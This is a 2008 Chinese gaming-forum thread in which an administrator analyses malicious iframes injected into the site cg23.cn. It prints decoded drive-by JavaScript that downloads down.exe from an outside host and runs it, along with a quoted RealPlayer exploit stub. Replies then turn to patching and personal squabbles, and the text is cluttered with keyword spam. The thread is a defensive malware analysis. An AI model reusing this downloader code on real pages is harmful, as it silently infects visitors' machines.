打印

[讨论] cg23分析

黄昏

管理员

Rank: 32

UID: 3983
精华: 1
积分: 1132
威望: 5 度

妖城妖帅勋章优秀版主专用勋章超级版主专用勋章优秀会员勋章爱心使者专用勋章高尚无私奉献心勋章资深元老勋章

阁楼大中小发表于 2008-2-4 21:47 只看该作者

cg23分析

Host: www.cg23.cn
Content-Location: http://www.cg23.cn/Index.htmbbs.mocwww.com' G. l3 ]0 W/ m( P) t
--src
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表2 A  F! U* }) p; c# @
<script language="JavaScript" type="text/JavaScript" src="http://news.baidu.com/ns?word=title%3A%C4%A7%C1%A6%B1%A6%B1%B4&tn=newsfcu&from=news&cl=2&rn=25&ct=0"></script>& f5 K  P  |; U
--百度新闻-魔力宝贝妖城在线论坛1 Z/ ^0 ?/ R  Z$ g. D

http://wpa.qq.com/pa?p=1:******************魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表( R9 U+ S8 e# J8 B
10数个魔力技术顾问的QQ链接bbs.mocwww.com# v: b; k" n( g

<script src="javascript/jf.js" type="text/javascript"></script>
//模仿语言包式的简繁转换功能插件！

<script language="javascript" type="text/javascript" src="http://js.users.51.la/1326170.js"></script>
51.la流量统计—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート- k6 f  i) z+ Z& @4 A

<script src='http://s71.cnzz.com/stat.php?id=722391&web_id=722391&online=2' language='JavaScript' charset='gb2312'></script>魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表: N* e* T6 l0 A* n9 E. i/ b- i
cnzz流量统计—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート% [5 E# I4 _* {3 s) s
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表% _9 r3 b( s) Y9 u
<script language="javascript" src="http://count36.51yes.com/click.aspx?id=361527223&logo=12"></script>—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート/ B* X& H1 [  ~4 h' `& ?3 ?- ]" `: f
51YES网站统计

<iframe src=http://1.100190.com/1.htm?6 width=50 height=0></iframe></a>魔力私服,最新魔力宝贝私服技术交流! f. R9 x9 ?. ~
下面是1.htm的内容bbs.mocwww.com9 m$ B5 }0 l; l: U
[<iframe src=http://1.100190.com/d/d.htm width=100 height=100></iframe>魔力私服,最新魔力宝贝私服技术交流$ S! w" @1 b! u2 q+ i1 E5 d9 Y
<iframe src=http://1.100190.com/d/06014.htm width=100 height=100></iframe>. C7 ^9 J7 r* z- i/ \# Z5 F$ {
<iframe src=http://1.100190.com/d/real.htm width=100 height=100></iframe>
这里是重点了魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表( _3 u* l0 `+ ?8 C8 A
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1586580.js"></script>
51.la流量统计
]bbs.mocwww.com9 n6 S5 v% j6 X
闲来无事，给大家分析一下吧
06014.htm 看名字好像是蛮老的那个溢出洞洞bbs.mocwww.com* a* c/ u6 G( v( N
解码后
<script>var fuck,cike;fuck="http://1.111281.com/down.exe";cike="cike.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var e=1;var xml=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var as=ado.createobject(ln+lzn+an,"");var h=1;xml.Open("GET",fuck,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(cike,2);as.close();var shell=ado.createobject("Shell.Application","");shell.Shellexecute(cike,"","","open",0);}catch(e){};</script>bbs.mocwww.com  ~4 M# p3 X3 O/ g6 b& W
貌似是个下载者饿，打包了，大家没事研究研究我就跳过了……

d.htm 解码之
<iframe style=display:none src="http://1.100190.com/d/bf.htm"></iframe>
呜呜，我们继续
空文件，可能是后备用的吧
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表- `2 A, ~' B7 J
real.htm 看名字可能根播放器的oday有关
解码之——魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表4 @9 @( S$ M4 y* f8 L: k3 Z! V
function RealExploit(){afdsffffasdf="flsdajflasdjfl32rewr231ffas";var ……
恩，查资料得知为机器狗病毒，不过不玩这个不大懂6 [& B$ J4 j; z2 v/ A* f
好了，确定是网马，至于效果如何，反正我没中招……
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート9 Z3 Q6 K1 P: H7 x* N( W
就酱子吧，很多防护不好的网站都会被人挂马，希望cde尽快处理，我对其人没有任何恶意的，大家不要有事没事就对他妄加否定，
想想人家辛辛苦苦为了什么那？开那么多群，没说过收费什么的吧？有知道的东西就共享出来也没见藏着掖着吧？
紫薇剑是谁我不晓得，+ v, r! Z- D1 C' t8 p4 q
但是cg23的ange我还是打过交道的……魔力私服,最新魔力宝贝私服技术交流: @0 c: F7 S8 V8 e# l! C0 Y

<param name="URL" value="http://www.jdzblog.com/uploadfiles/2007-3/327162852.mp3">, e9 X% {7 E1 E% K: d6 b0 K/ |5 ~! x
最后给大家附个音乐深吸一口气，放松一下，没什么大不了的……

[ 本帖最后由 myzz01 于 2008-2-4 21:53 编辑 ]

TOP

FGMAX

i'm EE!!

妖将

Rank: 5 Rank: 5

不认识的朋友叫我EE。

UID: 2851
精华: 6
积分: 2786
威望: 0 度
性别: 男

妖城妖使勋章

沙发大中小发表于 2008-2-4 21:49 只看该作者

那个是内嵌的JS调用溢出马.很老的一种了..—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート2 O) d" G& R2 G: v. s2 }( J
LS的兄弟我劝你..—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート9 T+ v" b. h+ M/ i# O1 k
搞CG,不知道紫薇剑,就和中国人不知道毛泽东一样.5 V6 ~! Y! a3 _0 F. g
你没资格说内些话..

你的名气很大，并不代表着你很强大。

TOP

FGMAX

i'm EE!!

妖将

Rank: 5 Rank: 5

不认识的朋友叫我EE。

UID: 2851
精华: 6
积分: 2786
威望: 0 度
性别: 男

妖城妖使勋章

板凳大中小发表于 2008-2-4 21:50 只看该作者

魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表) [ h9 z% _* v3 A% u" V
开那么多群.从来没说过话.
和某XXOO反挂不一样?魔力私服,最新魔力宝贝私服技术交流- ^5 H5 f& H9 R' ]
技术群一大堆.问问题没见回.0 D4 q; ^0 T2 t& Y# H, y5 E1 U
一买他东西积极的很.

他现在扔出来的东西都是别人淘汰的.
也不知道谁抱着一套所谓的反挂,还当宝咧..

你的名气很大，并不代表着你很强大。

TOP

厶⒉姙⒈

ＬilimedＡ

妖帅

Rank: 9 Rank: 9 Rank: 9

☆為了水王的榮耀！

UID: 2296
精华: 6
积分: 4979
威望: 2 度
性别: 女

妖城妖将勋章女性会员勋章优秀会员勋章抢沙发大王专用勋章灌水天才勋章爱心使者专用勋章

地板大中小发表于 2008-2-4 21:58 只看该作者

这样啊··

TOP

黄昏

管理员

Rank: 32

UID: 3983
精华: 1
积分: 1132
威望: 5 度

妖城妖帅勋章优秀版主专用勋章超级版主专用勋章优秀会员勋章爱心使者专用勋章高尚无私奉献心勋章资深元老勋章

地下室 大中小发表于 2008-2-4 21:59 只看该作者

那个  资格不晓得要怎么赚取 …… :-)  是不是当中国人只要知道毛泽东就具备中国人的血统了？估计某些知道老毛的小日本要雀跃了……
血统是与生俱来的，根毛泽东关系不大，我的资格仿佛也根我知道不知道紫薇剑关系不大吧？bbs.mocwww.com4 [- Y1 {% Z+ _$ y0 Q
我喜欢根海星兄妖哥小男这样说话爽快的人交流，至于不从技术方面讨论问题而专门搞人事鉴定的……  不是很感冒……
(*^__^*) 随便说说拉 ange真的打了很久叫道的从我开始研究魔力（快1个月了）没事都会在QQ上交流下的 ——感觉人有点迷糊但是没有什么坏心眼吧？
至于FGMAX ：）我可是加你QQ拜师的哦可惜你不回复…… 唉  要不现在收下我吧？

TOP

FGMAX

i'm EE!!

妖将

Rank: 5 Rank: 5

不认识的朋友叫我EE。

UID: 2851
精华: 6
积分: 2786
威望: 0 度
性别: 男

妖城妖使勋章

6楼大中小发表于 2008-2-4 22:08 只看该作者

我，大家都知道，对话不对人。
要是惹着你了就当别在意。妖城在线论坛5 {% X& V+ I4 j4 Z
妖城在线论坛' i1 T" o; P5 W+ s4 |+ ?! X& d
加我人太多，每天问问题人也太多。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表* v; l. [' x) k1 \0 e
不能一一照料。
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表1 ?2 ?$ E$ o+ i T: L; \6 t# A d
我就收了一个徒弟，晨曦。

以后有需要就说，知道肯定告你。

你的名气很大，并不代表着你很强大。

TOP

黄昏

管理员

Rank: 32

UID: 3983
精华: 1
积分: 1132
威望: 5 度

妖城妖帅勋章优秀版主专用勋章超级版主专用勋章优秀会员勋章爱心使者专用勋章高尚无私奉献心勋章资深元老勋章

7楼大中小发表于 2008-2-4 22:28 只看该作者

引用:

原帖由 FGMAX 于 2008-2-4 22:08 发表
6 |2 v& O5 h: i' Z& ]我，大家都知道，对话不对人。
要是惹着你了就当别在意。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表8 e( k: b; }9 T/ I3 w5 m2 F

加我人太多，每天问问题人也太多。魔力私服,最新魔力宝贝私服技术交流+ x Y7 K$ }( l! [' }
不能一一照料。—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート) n4 K% H, e" c+ y3 C8 P
bbs.mocwww.com& ]( ^0 z9 V0 k' [
我就收了一个徒弟，晨曦。
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート7 S2 m9 j) l1 d
以后有需要就说，知道肯定告你。

魔力私服,最新魔力宝贝私服技术交流4 m+ ~) v. ~2 f* ]2 `

：）交个朋友一起交流饿 …… 我去想办法看懂魔力封包处理部分的代码去…… 想学的东西太多时间太少一动就该睡觉了……郁闷　ＨＯＨＯ　　晚上见……

TOP

31558770a

禁止访问

UID: 3449
精华: 5
积分: 1089
威望: 1 度

8楼大中小发表于 2008-2-4 22:38 只看该作者

回家前上来看看—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート9 ~9 h8 |# d- m+ w

TOP

itsong

禁止访问

UID: 1906
精华: 1
积分: 294
威望: 1 度
性别: 男

9楼大中小发表于 2008-2-4 22:45 只看该作者

RealPlayer 的溢出漏洞,打完RealPlayer溢出补丁的不会中.

TOP

ｋ|尛水

全都不复存在了

版主

Rank: 16

不仰望别人、自己亦是风景、

UID: 4435
精华: 2
积分: 866
威望: 0 度

妖城妖帅勋章女性会员勋章抢沙发大王专用勋章

10楼 大中小发表于 2008-2-4 22:53 只看该作者

RealPlayer 不装呢- -

TOP

healcs01

黑羽の庆

妖精

Rank: 2 Rank: 2

UID: 1562
精华: 2
积分: 449
威望: 0 度
性别: 男

11楼 大中小发表于 2008-2-5 08:54 只看该作者

CG23就是白吃,乱吧人的QQ放在他网页上当什么顾问我日

TOP

黄昏

管理员

Rank: 32

UID: 3983
精华: 1
积分: 1132
威望: 5 度

妖城妖帅勋章优秀版主专用勋章超级版主专用勋章优秀会员勋章爱心使者专用勋章高尚无私奉献心勋章资深元老勋章

12楼 大中小发表于 2008-2-5 09:50 只看该作者

引用:

原帖由 ?ｋ|尛水 于 2008-2-4 22:53 发表 —魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート5 x5 j0 k* `8 z3 i' o/ G1 \/ g
RealPlayer 不装呢- -

—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート2 f @( H" M8 F6 k @$ @
不装当然就中不了real的0day了，不过其他溢出漏洞不胜枚举，而且就算不中马，被挂马的站访问起来也会很慢…… 经常访问很容易体会出区别…… 中木马也一样你要经常使用电脑就会有手感的当机器中木马病毒什么的你就会感觉不顺手了……